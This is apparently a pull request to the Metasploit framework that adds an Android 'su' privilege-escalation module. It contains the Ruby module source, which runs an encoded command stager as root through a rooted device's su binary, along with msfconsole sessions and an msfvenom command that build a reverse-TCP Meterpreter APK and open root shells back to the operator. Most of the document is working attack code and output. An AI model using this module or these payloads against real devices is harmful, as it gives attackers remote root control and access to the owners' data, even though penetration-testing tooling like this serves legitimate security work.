### PR TITLE
Add an Android module to run payloads with su on a rooted device

### DIFF
--- a/documentation/modules/exploit/android/local/su_exec.md
+++ b/documentation/modules/exploit/android/local/su_exec.md
@@ -1,0 +1,57 @@
+## Description
+
+This module uses the su binary present on rooted devices to run a payload as root.
+
+A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root.
+This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a
+temporary directory, make it executable, execute it in the background, and finally delete the executable.
+
+On most devices the su binary will pop-up a prompt on the device asking the user for permission.
+
+## Vulnerable Application
+
+This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data.
+Many devices can be rooted by flashing new firmware, however the existing data will be lost.
+
+## Verfication steps
+
+You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md)
+
+Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. 
+An example session follows:
+
+```
+msf5 exploit(multi/handler) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type                        Information         Connection
+  --  ----  ----                        -----------         ----------
+  1         meterpreter dalvik/android  u0_a80 @ localhost  192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107)
+
+msf5 exploit(multi/handler) > use exploit/android/local/su_exec
+msf5 exploit(android/local/su_exec) > set SESSION 1
+SESSION => 1
+msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
+payload => linux/aarch64/meterpreter/reverse_tcp
+msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176
+LHOST => 192.168.0.176
+msf5 exploit(android/local/su_exec) > set LPORT 4445
+LPORT => 4445
+msf5 exploit(android/local/su_exec) > run
+
+[!] SESSION may not be compatible with this module.
+[*] Started reverse TCP handler on 192.168.0.176:4445
+[*] Transmitting intermediate midstager...(256 bytes)
+[*] Sending stage (818780 bytes) to 192.168.0.107
+[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800
+[-] Exploit failed: Rex::TimeoutError Operation timed out.
+[*] Exploit completed, but no session was created.
+
+```
+
+Please not that in most cases you will have to manually confirm the Superuser prompt 
+on the device itself before the module completes. You can do `set WfsDelay 10` to
+give yourself more time.
+

--- a/modules/exploits/android/local/su_exec.rb
+++ b/modules/exploits/android/local/su_exec.rb
@@ -7,6 +7,8 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ManualRanking
 
   include Msf::Exploit::CmdStager
+  include Msf::Post::File
+  include Msf::Post::Android::Priv
 
   def initialize(info={})
     super( update_info( info, {
@@ -15,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Local
           This module uses the su binary present on rooted devices to run
           a payload as root.
 
-          A root Android device will contain a su binary (often linked with
+          A rooted Android device will contain a su binary (often linked with
           an application) that allows the user to run commands as root.
           This module will use the su binary to execute a command stager
           as root. The command stager will write a payload binary to a
@@ -29,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Local
       'DisclosureDate' => 'Aug 31 2017',
       'SessionTypes'   => [ 'meterpreter', 'shell' ],
       'Platform'       => [ 'android', 'linux' ],
-      'Arch'           => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+      'Arch'           => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ],
       'Targets'        => [
         ['aarch64',{'Arch' => ARCH_AARCH64}],
         ['armle',  {'Arch' => ARCH_ARMLE}],
@@ -37,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Local
         ['x64',    {'Arch' => ARCH_X64}],
         ['mipsle', {'Arch' => ARCH_MIPSLE}]
       ],
+      'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' },
       'DefaultTarget'  => 0,
       }
     ))
@@ -46,20 +49,32 @@ class MetasploitModule < Msf::Exploit::Local
     ])
   end
 
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def su_bin
+    datastore['SU_BINARY'].to_s
+  end
+
   def exploit
-    linemax = 4088 - datastore['SU_BINARY'].size
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    linemax = 4088 - su_bin.size
     execute_cmdstager({
       flavor: :echo,
       enc_format: :octal,
       prefix: '\\\\0',
-      temp: datastore['WritableDir'],
+      temp: base_dir,
       linemax: linemax,
       background: true,
     })
   end
 
   def execute_command(cmd, opts)
-    su_cmd = "#{datastore['SU_BINARY']} -c '#{cmd}'"
+    su_cmd = "#{su_bin} -c '#{cmd}'"
     cmd_exec(su_cmd)
   end
 

--- a/modules/exploits/android/local/su_exec.rb
+++ b/modules/exploits/android/local/su_exec.rb
@@ -4,7 +4,7 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Local
-  Rank = ExcellentRanking
+  Rank = ManualRanking
 
   include Msf::Exploit::CmdStager
 
@@ -14,6 +14,16 @@ class MetasploitModule < Msf::Exploit::Local
       'Description'    => %q{
           This module uses the su binary present on rooted devices to run
           a payload as root.
+
+          A root Android device will contain a su binary (often linked with
+          an application) that allows the user to run commands as root.
+          This module will use the su binary to execute a command stager
+          as root. The command stager will write a payload binary to a
+          temporary directory, make it executable, execute it in the background,
+          and finally delete the executable.
+
+          On most devices the su binary will pop-up a prompt on the device
+          asking the user for permission.
       },
       'License'        => MSF_LICENSE,
       'DisclosureDate' => 'Aug 31 2017',

--- a/modules/exploits/android/local/su_exec.rb
+++ b/modules/exploits/android/local/su_exec.rb
@@ -17,12 +17,12 @@ class MetasploitModule < Msf::Exploit::Local
       },
       'License'        => MSF_LICENSE,
       'DisclosureDate' => 'Aug 31 2017',
-      'SessionTypes'   => [ 'meterpreter' ],
+      'SessionTypes'   => [ 'meterpreter', 'shell' ],
       'Platform'       => [ 'android', 'linux' ],
-      'Arch'           => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+      'Arch'           => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
       'Targets'        => [
-        ['armle',  {'Arch' => ARCH_ARMLE}],
         ['aarch64',{'Arch' => ARCH_AARCH64}],
+        ['armle',  {'Arch' => ARCH_ARMLE}],
         ['x86',    {'Arch' => ARCH_X86}],
         ['x64',    {'Arch' => ARCH_X64}],
         ['mipsle', {'Arch' => ARCH_MIPSLE}]
@@ -37,9 +37,6 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    arch = cmd_exec("getprop ro.product.cpu.abi")
-    print_status("Arch: #{arch}")
-
     linemax = 4088 - datastore['SU_BINARY'].size
     execute_cmdstager({
       flavor: :echo,
@@ -52,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def execute_command(cmd, opts)
-    su_cmd = "#{datastore['SU_BINARY']} -c #{cmd}"
+    su_cmd = "#{datastore['SU_BINARY']} -c '#{cmd}'"
     cmd_exec(su_cmd)
   end
 

--- a/modules/exploits/android/local/su_exec.rb
+++ b/modules/exploits/android/local/su_exec.rb
@@ -1,0 +1,60 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::CmdStager
+
+  def initialize(info={})
+    super( update_info( info, {
+      'Name'           => "Android 'su' Privilege Escalation",
+      'Description'    => %q{
+          This module uses the su binary present on rooted devices to run
+          a payload as root.
+      },
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => 'Aug 31 2017',
+      'SessionTypes'   => [ 'meterpreter' ],
+      'Platform'       => [ 'android', 'linux' ],
+      'Arch'           => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64, ARCH_MIPSLE],
+      'Targets'        => [
+        ['armle',  {'Arch' => ARCH_ARMLE}],
+        ['aarch64',{'Arch' => ARCH_AARCH64}],
+        ['x86',    {'Arch' => ARCH_X86}],
+        ['x64',    {'Arch' => ARCH_X64}],
+        ['mipsle', {'Arch' => ARCH_MIPSLE}]
+      ],
+      'DefaultTarget'  => 0,
+      }
+    ))
+    register_options([
+      OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']),
+      OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']),
+    ])
+  end
+
+  def exploit
+    arch = cmd_exec("getprop ro.product.cpu.abi")
+    print_status("Arch: #{arch}")
+
+    linemax = 4088 - datastore['SU_BINARY'].size
+    execute_cmdstager({
+      flavor: :echo,
+      enc_format: :octal,
+      prefix: '\\\\0',
+      temp: datastore['WritableDir'],
+      linemax: linemax,
+      background: true,
+    })
+  end
+
+  def execute_command(cmd, opts)
+    su_cmd = "#{datastore['SU_BINARY']} -c #{cmd}"
+    cmd_exec(su_cmd)
+  end
+
+end
+

--- a/modules/exploits/android/local/su_exec.rb
+++ b/modules/exploits/android/local/su_exec.rb
@@ -39,7 +39,10 @@ class MetasploitModule < Msf::Exploit::Local
         ['x64',    {'Arch' => ARCH_X64}],
         ['mipsle', {'Arch' => ARCH_MIPSLE}]
       ],
-      'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' },
+      'DefaultOptions' => {
+        'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp',
+        'WfsDelay' => 5,
+      },
       'DefaultTarget'  => 0,
       }
     ))


### PR DESCRIPTION
This is a quick module that allows you to run payloads with the /system/xbin/su binary present on a rooted Android device. This effectively works a local root exploit but may require the user to grant permission.

## Verification

List the steps needed to make sure this thing works

- [x] Get a normal Android meterpreter session: e,g:
- [x] `msfconsole -qx "use exploit/multi/handler; set payload android/meterpreter/reverse_tcp; setg lhost LHOST; set lport 4444; set ExitOnSession false; run -j"`
- [x] `msfvenom -p android/meterpreter/reverse_tcp LHOST=LHOST LPORT=4444 -o meterpreter.apk`
- [ ] `...`
- [x] Use the module, e.g:
```
msf5 exploit(multi/handler) > use exploit/android/local/su_exec
msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp
payload => linux/aarch64/meterpreter/reverse_tcp
msf5 exploit(android/local/su_exec) > set SESSION -1
SESSION => -1
msf5 exploit(android/local/su_exec) > set LHOST LHOST
LHOST => LHOST
msf5 exploit(android/local/su_exec) > set LPORT 4433
LPORT => 4433
msf5 exploit(android/local/su_exec) > run
```
- [x] **Verify** you get a working linux meterpreter session as uid 0
- [x] **Verify** the existing Android session is still working
- [ ] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

